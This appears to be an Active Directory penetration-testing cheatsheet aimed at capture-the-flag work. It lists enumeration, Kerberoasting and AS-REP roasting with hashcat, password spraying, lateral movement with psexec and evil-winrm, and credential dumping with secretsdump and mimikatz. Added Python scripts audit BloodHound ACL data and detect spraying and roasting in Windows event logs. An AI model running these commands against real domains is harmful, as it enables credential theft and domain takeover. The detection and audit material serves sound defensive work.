```bash
crackmapexec smb dc -u user -p pass
netexec smb dc -u user -p pass --shares
rpcclient -U 'user%pass' dc
smbclient -L //dc -U user
ldapsearch -x -H ldap://dc -D 'user@dom.local' -w pass -b 'DC=dom,DC=local'
```
| Target | Why |
|---|---|
| valid creds | domain user often enough to start |
| SMB shares | scripts, backups, passwords |
| LDAP info | users, groups, SPNs, descriptions |
| WinRM/RDP | direct shell path |
| bloodhound data | graph attack paths |
```bash
GetUserSPNs.py dom.local/user:pass -dc-ip dc -request
GetNPUsers.py dom.local/ -usersfile users.txt -dc-ip dc -no-pass
hashcat -m 13100 kerb.txt wordlist
hashcat -m 18200 asrep.txt wordlist
```
```bash
bloodhound-python -u user -p pass -d dom.local -c All -ns dc
```

Then inspect the collected data for:

- GenericAll / GenericWrite
- ForceChangePassword
- AddMember
- RBCD / delegation
- DCSync rights
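The rights listed above can be pulled straight out of the collector's JSON without opening the graph UI, which is also how a defender audits a domain for the same misconfigurations. The script below is an added example, not part of the cheatsheet and not BloodHound's own code. It assumes the BloodHound v4 JSON layout that bloodhound-python writes (a top-level `data` list whose objects carry `Properties.name` and an `Aces` list with `PrincipalSID` / `RightName`), and the SIDs, names and ACEs in the sample are constructed.

```python
"""Audit BloodHound-style JSON for the risky ACEs the cheatsheet lists.

Added example, not part of the original cheatsheet and not BloodHound's code.
Assumes the BloodHound v4 collector layout written by bloodhound-python.
All sample SIDs, names and ACEs below are constructed.
"""
from collections import defaultdict

# Rights worth reporting, with the reason each one matters.
RISKY_RIGHTS = {
    "GenericAll": "full control of the object",
    "GenericWrite": "write any attribute",
    "WriteOwner": "take ownership, then grant rights",
    "WriteDacl": "rewrite the DACL, then grant rights",
    "ForceChangePassword": "reset the password without knowing it",
    "AddMember": "add principals to the group",
    "AddAllowedToAct": "configure resource-based constrained delegation",
    "GetChanges": "replicate directory changes (half of DCSync)",
    "GetChangesAll": "replicate secrets (other half of DCSync)",
}

# Principals expected to hold these rights by default; skipped so the report
# only shows non-default grants. RIDs: 512 Domain Admins, 516 Domain
# Controllers, 518 Schema Admins, 519 Enterprise Admins.
DEFAULT_RIDS = {"-512", "-516", "-518", "-519"}
WELLKNOWN_SIDS = {"S-1-5-32-544", "S-1-5-18", "S-1-5-9"}  # Administrators, SYSTEM, Enterprise DCs


def is_default_principal(sid):
    return sid in WELLKNOWN_SIDS or any(sid.endswith(rid) for rid in DEFAULT_RIDS)


def find_risky_aces(collection, sid_names=None):
    """Return (principal, right, target, reason) tuples for non-default risky ACEs."""
    sid_names = sid_names or {}
    findings = []
    for obj in collection.get("data", []):
        target = obj.get("Properties", {}).get("name", obj.get("ObjectIdentifier", "?"))
        for ace in obj.get("Aces", []):
            right = ace.get("RightName")
            sid = ace.get("PrincipalSID", "")
            if right not in RISKY_RIGHTS or is_default_principal(sid):
                continue
            findings.append((sid_names.get(sid, sid), right, target, RISKY_RIGHTS[right]))
    return findings


def dcsync_capable(findings):
    """Principals holding BOTH replication rights on the same (domain) object."""
    held = defaultdict(set)
    for principal, right, target, _ in findings:
        if right in ("GetChanges", "GetChangesAll"):
            held[(principal, target)].add(right)
    return sorted(p for (p, _), r in held.items() if r == {"GetChanges", "GetChangesAll"})


# Constructed sample: a hypothetical user object and domain object.
SID_NAMES = {
    "S-1-5-21-1-2-3-1108": "JDOE@DOM.LOCAL",
    "S-1-5-21-1-2-3-1109": "HELPDESK@DOM.LOCAL",
}
SAMPLE_USERS = {"data": [{
    "ObjectIdentifier": "S-1-5-21-1-2-3-1105",
    "Properties": {"name": "SVC_BACKUP@DOM.LOCAL"},
    "Aces": [
        {"PrincipalSID": "S-1-5-21-1-2-3-1108", "PrincipalType": "User",
         "RightName": "GenericAll", "IsInherited": False},
        {"PrincipalSID": "S-1-5-21-1-2-3-512", "PrincipalType": "Group",
         "RightName": "GenericAll", "IsInherited": True},  # Domain Admins: default, skipped
    ]}]}
SAMPLE_DOMAIN = {"data": [{
    "ObjectIdentifier": "S-1-5-21-1-2-3",
    "Properties": {"name": "DOM.LOCAL"},
    "Aces": [
        {"PrincipalSID": "S-1-5-21-1-2-3-1108", "PrincipalType": "User", "RightName": "GetChanges"},
        {"PrincipalSID": "S-1-5-21-1-2-3-1108", "PrincipalType": "User", "RightName": "GetChangesAll"},
        {"PrincipalSID": "S-1-5-21-1-2-3-1109", "PrincipalType": "Group", "RightName": "GetChanges"},
    ]}]}

if __name__ == "__main__":
    for f in find_risky_aces(SAMPLE_USERS, SID_NAMES) + find_risky_aces(SAMPLE_DOMAIN, SID_NAMES):
        print("%-22s %-20s on %-22s (%s)" % f)
    print("DCSync-capable:", dcsync_capable(find_risky_aces(SAMPLE_DOMAIN, SID_NAMES)))
```

Run it against real collector output by replacing the sample dicts with `json.load()` of `*_users.json` and `*_domains.json`; the default-principal filter is what keeps the report short enough to read, since Domain Admins legitimately hold every one of these rights.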
```bash
netexec smb targets.txt -u users.txt -p 'Winter2024!' --continue-on-success
# keep attempts low; respect lockout in real envs
```
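Both the roasting commands and the spray above leave a distinctive shape in the domain controller's Security log, which is what the lockout caveat is really about: one source failing against many accounts, or one account requesting many RC4 service tickets in seconds. The detector below is an added example for the defender's side of those two commands; it is not part of the cheatsheet. The event IDs are the real Windows Security IDs (4625 failed logon, 4771 Kerberos pre-auth failed, 4769 TGS request), but the flattened field names, the thresholds and the sample events are constructed assumptions, not SIEM defaults.

```python
"""Flag password-spray and Kerberoast patterns in simplified Security events.

Added example, not part of the cheatsheet. Events are constructed dicts with
the fields a SIEM would extract: id, time, src, user, svc, etype.
Thresholds are illustrative assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SPRAY_WINDOW = timedelta(minutes=10)
SPRAY_MIN_USERS = 5       # distinct accounts failing from one source
ROAST_WINDOW = timedelta(minutes=5)
ROAST_MIN_SPNS = 5        # distinct services one account requested
RC4_HMAC = "0x17"         # TicketEncryptionType for RC4 (the hashcat -m 13100 shape)


def _windows(events, key, subkey, window, min_distinct, match):
    """Group matching events by `key`; report keys whose distinct `subkey`
    count inside any sliding `window` reaches `min_distinct`."""
    by_key = defaultdict(list)
    for e in events:
        if match(e):
            by_key[e[key]].append(e)
    hits = {}
    for k, evs in by_key.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):
            distinct = {e[subkey] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(distinct) >= min_distinct:
                hits[k] = max(hits.get(k, 0), len(distinct))
    return hits


def detect_spray(events):
    """Sources that failed logons for many distinct users: {src: distinct_users}."""
    return _windows(events, "src", "user", SPRAY_WINDOW, SPRAY_MIN_USERS,
                    lambda e: e["id"] in (4625, 4771))


def detect_kerberoast(events):
    """Accounts that pulled many RC4 service tickets: {user: distinct_spns}.
    krbtgt tickets are TGT renewals, not SPN requests, so they are excluded."""
    return _windows(events, "user", "svc", ROAST_WINDOW, ROAST_MIN_SPNS,
                    lambda e: e["id"] == 4769 and e.get("etype") == RC4_HMAC
                    and not e["svc"].lower().startswith("krbtgt"))


# Constructed sample log: one spraying source, one user with a typo,
# one account roasting six SPNs, one account doing normal AES requests.
T0 = datetime(2024, 1, 15, 9, 0, 0)


def _ev(secs, **fields):
    fields["time"] = T0 + timedelta(seconds=secs)
    return fields


SAMPLE_EVENTS = (
    [_ev(10 * i, id=4625, src="10.0.0.5", user=f"user{i}") for i in range(6)]
    + [_ev(30, id=4625, src="10.0.0.9", user="asmith"),
       _ev(40, id=4625, src="10.0.0.9", user="asmith")]
    + [_ev(100 + 5 * i, id=4769, src="10.0.0.5", user="jdoe",
           svc=f"MSSQLSvc/db{i}.dom.local", etype="0x17") for i in range(6)]
    + [_ev(120, id=4769, src="10.0.0.9", user="asmith", svc="HTTP/web.dom.local", etype="0x12"),
       _ev(125, id=4769, src="10.0.0.9", user="asmith", svc="krbtgt/DOM.LOCAL", etype="0x17")]
)

if __name__ == "__main__":
    print("spray sources:", detect_spray(SAMPLE_EVENTS))
    print("roasting accounts:", detect_kerberoast(SAMPLE_EVENTS))
```

The same two-pointer window also covers AS-REP roasting if you feed it 4768 events and key on the source instead of the account; the thresholds are the part to tune per environment, since service accounts and monitoring hosts legitimately request many tickets.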
```bash
evil-winrm -i host -u user -p pass
psexec.py dom.local/user:pass@host
wmiexec.py dom.local/user:pass@host
smbexec.py dom.local/user:pass@host
```
```bash
secretsdump.py dom.local/user:pass@dc
klist
Rubeus triage
mimikatz 'sekurlsa::logonpasswords'
# common CTF goal: get admin hash or flag from DC/share
```
| Misconfig | Abuse |
|---|---|
| description fields | passwords or hints |
| SYSVOL / NETLOGON | scripts with creds |
| delegation / RBCD | machine account abuse |
| WriteOwner / WriteDacl | take over object |
| backup operators / print operators | privileged paths |
- forgetting the domain format (`user@domain` or `DOMAIN\user`)
- not syncing time for Kerberos
- assuming SMB only; try WinRM / LDAP / RPC too
- ignoring machine accounts and gMSA-related leads